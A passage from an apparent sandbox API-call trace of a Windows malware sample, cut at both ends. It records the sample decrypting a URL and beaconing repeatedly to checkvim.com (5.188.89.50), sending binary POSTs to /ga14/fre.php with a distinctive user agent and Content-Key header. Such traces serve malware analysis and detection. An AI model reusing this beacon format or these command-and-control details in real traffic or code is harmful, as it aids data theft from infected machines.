ppResult=0x19f980*=0x0) returned 11001 [0327.167] GetProcessHeap () returned 0x840000 [0327.168] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713d0 | out: hHeap=0x840000) returned 1 [0327.168] GetProcessHeap () returned 0x840000 [0327.168] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0327.168] GetProcessHeap () returned 0x840000 [0327.168] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0327.168] GetProcessHeap () returned 0x840000 [0327.168] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0327.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.169] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0327.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.176] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0327.182] GetProcessHeap () returned 0x840000 [0327.182] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0327.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.183] CryptImportKey (in: hProv=0x86f688, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0327.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.185] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0327.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.186] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0327.186] GetProcessHeap () returned 0x840000 [0327.186] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0327.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.187] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0327.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.189] CryptDestroyKey (hKey=0x87e270) returned 1 [0327.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.190] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0327.190] GetProcessHeap () returned 0x840000 [0327.190] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0327.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0327.191] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0327.192] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0327.192] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0327.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0327.193] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0327.193] GetProcessHeap () returned 0x840000 [0327.193] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0327.194] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871510*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0327.196] GetProcessHeap () returned 0x840000 [0327.196] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b38 [0327.196] socket (af=2, type=1, protocol=6) returned 0x5a4 [0327.196] connect (s=0x5a4, name=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0327.273] FreeAddrInfoW (pAddrInfo=0x871510*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0327.274] GetProcessHeap () returned 0x840000 [0327.274] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0327.274] GetProcessHeap () returned 0x840000 [0327.274] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0327.274] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0327.275] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0327.275] GetProcessHeap () returned 0x840000 [0327.275] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0327.275] GetProcessHeap () returned 0x840000 [0327.276] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0327.276] GetProcessHeap () returned 0x840000 [0327.276] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fcf8 [0327.276] GetProcessHeap () returned 0x840000 [0327.276] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0327.277] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0327.278] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0327.278] GetProcessHeap () returned 0x840000 [0327.278] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0327.278] GetProcessHeap () returned 0x840000 [0327.278] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0327.278] send (s=0x5a4, buf=0x873a58*, len=237, flags=0) returned 237 [0327.278] send (s=0x5a4, buf=0x87eb58*, len=159, flags=0) returned 159 [0327.278] GetProcessHeap () returned 0x840000 [0327.279] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0327.279] recv (in: s=0x5a4, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0327.663] GetProcessHeap () returned 0x840000 [0327.663] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0327.664] GetProcessHeap () returned 0x840000 [0327.664] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcf8 | out: hHeap=0x840000) returned 1 [0327.664] GetProcessHeap () returned 0x840000 [0327.664] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0327.664] GetProcessHeap () returned 0x840000 [0327.664] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0327.664] closesocket (s=0x5a4) returned 0 [0327.665] GetProcessHeap () returned 0x840000 [0327.665] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b38 | out: hHeap=0x840000) returned 1 [0327.665] GetProcessHeap () returned 0x840000 [0327.665] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0327.665] GetProcessHeap () returned 0x840000 [0327.665] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0327.665] GetProcessHeap () returned 0x840000 [0327.665] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0327.669] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x11f0) returned 0x5a4 [0327.698] Sleep (dwMilliseconds=0xea60) [0327.705] GetProcessHeap () returned 0x840000 [0327.705] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0327.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.706] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0327.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.712] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0327.718] GetProcessHeap () returned 0x840000 [0327.718] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0327.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.719] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0327.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.719] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0327.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.721] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0327.721] GetProcessHeap () returned 0x840000 [0327.721] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0327.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.721] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0327.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.725] CryptDestroyKey (hKey=0x87e930) returned 1 [0327.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.726] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0327.726] GetProcessHeap () returned 0x840000 [0327.726] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0327.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0327.727] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0327.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0327.728] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0327.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0327.728] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0327.729] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0327.729] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0327.729] GetProcessHeap () returned 0x840000 [0327.729] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0327.729] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0327.730] GetProcessHeap () returned 0x840000 [0327.730] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0327.730] GetProcessHeap () returned 0x840000 [0327.730] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0327.730] GetProcessHeap () returned 0x840000 [0327.730] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0327.730] GetProcessHeap () returned 0x840000 [0327.730] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f758 [0327.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.731] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0327.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.735] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0327.740] GetProcessHeap () returned 0x840000 [0327.741] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0327.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.742] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e570) returned 1 [0327.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.742] CryptSetKeyParam (hKey=0x87e570, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0327.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.743] CryptSetKeyParam (hKey=0x87e570, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0327.743] GetProcessHeap () returned 0x840000 [0327.743] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0327.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.744] CryptDecrypt (in: hKey=0x87e570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f758, pdwDataLen=0x19f9a4 | out: pbData=0x87f758, pdwDataLen=0x19f9a4) returned 1 [0327.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.745] CryptDestroyKey (hKey=0x87e570) returned 1 [0327.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0327.745] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0327.745] GetProcessHeap () returned 0x840000 [0327.745] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0327.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0327.746] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0327.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0327.747] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0327.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0327.748] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0327.748] GetProcessHeap () returned 0x840000 [0327.748] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0327.748] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871538*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0327.750] GetProcessHeap () returned 0x840000 [0327.750] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0327.750] socket (af=2, type=1, protocol=6) returned 0x5a8 [0327.750] connect (s=0x5a8, name=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0327.820] FreeAddrInfoW (pAddrInfo=0x871538*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0327.820] GetProcessHeap () returned 0x840000 [0327.820] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0327.820] GetProcessHeap () returned 0x840000 [0327.820] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0327.821] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0327.822] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0327.822] GetProcessHeap () returned 0x840000 [0327.822] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0327.822] GetProcessHeap () returned 0x840000 [0327.822] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0327.822] GetProcessHeap () returned 0x840000 [0327.822] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0327.822] GetProcessHeap () returned 0x840000 [0327.822] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0327.823] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0327.824] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0327.824] GetProcessHeap () returned 0x840000 [0327.824] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0327.824] GetProcessHeap () returned 0x840000 [0327.824] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0327.824] send (s=0x5a8, buf=0x873a58*, len=237, flags=0) returned 237 [0327.825] send (s=0x5a8, buf=0x87eb58*, len=159, flags=0) returned 159 [0327.825] GetProcessHeap () returned 0x840000 [0327.825] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0327.825] recv (in: s=0x5a8, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0328.195] GetProcessHeap () returned 0x840000 [0328.195] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0328.195] GetProcessHeap () returned 0x840000 [0328.195] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0328.195] GetProcessHeap () returned 0x840000 [0328.195] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0328.196] GetProcessHeap () returned 0x840000 [0328.196] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0328.196] closesocket (s=0x5a8) returned 0 [0328.196] GetProcessHeap () returned 0x840000 [0328.196] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0328.196] GetProcessHeap () returned 0x840000 [0328.196] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0328.196] GetProcessHeap () returned 0x840000 [0328.196] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0328.196] GetProcessHeap () returned 0x840000 [0328.196] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0328.196] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1110) returned 0x5a8 [0328.198] Sleep (dwMilliseconds=0xea60) [0328.236] GetProcessHeap () returned 0x840000 [0328.236] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0328.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.237] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0328.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.242] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fac8) returned 1 [0328.248] GetProcessHeap () returned 0x840000 [0328.248] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0328.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.249] CryptImportKey (in: hProv=0x86fac8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6b0) returned 1 [0328.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.250] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0328.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.251] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0328.251] GetProcessHeap () returned 0x840000 [0328.251] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0328.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.279] CryptDecrypt (in: hKey=0x87e6b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0328.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.280] CryptDestroyKey (hKey=0x87e6b0) returned 1 [0328.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.281] CryptReleaseContext (hProv=0x86fac8, dwFlags=0x0) returned 1 [0328.281] GetProcessHeap () returned 0x840000 [0328.281] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0328.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0328.282] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0328.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0328.283] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0328.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0328.284] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0328.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0328.285] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0328.285] GetProcessHeap () returned 0x840000 [0328.285] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0328.286] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0328.286] GetProcessHeap () returned 0x840000 [0328.286] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0328.286] GetProcessHeap () returned 0x840000 [0328.286] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0328.286] GetProcessHeap () returned 0x840000 [0328.286] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0328.286] GetProcessHeap () returned 0x840000 [0328.286] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fd88 [0328.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.287] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0328.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.293] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0328.300] GetProcessHeap () returned 0x840000 [0328.300] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0328.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.301] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e730) returned 1 [0328.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.302] CryptSetKeyParam (hKey=0x87e730, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0328.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.303] CryptSetKeyParam (hKey=0x87e730, 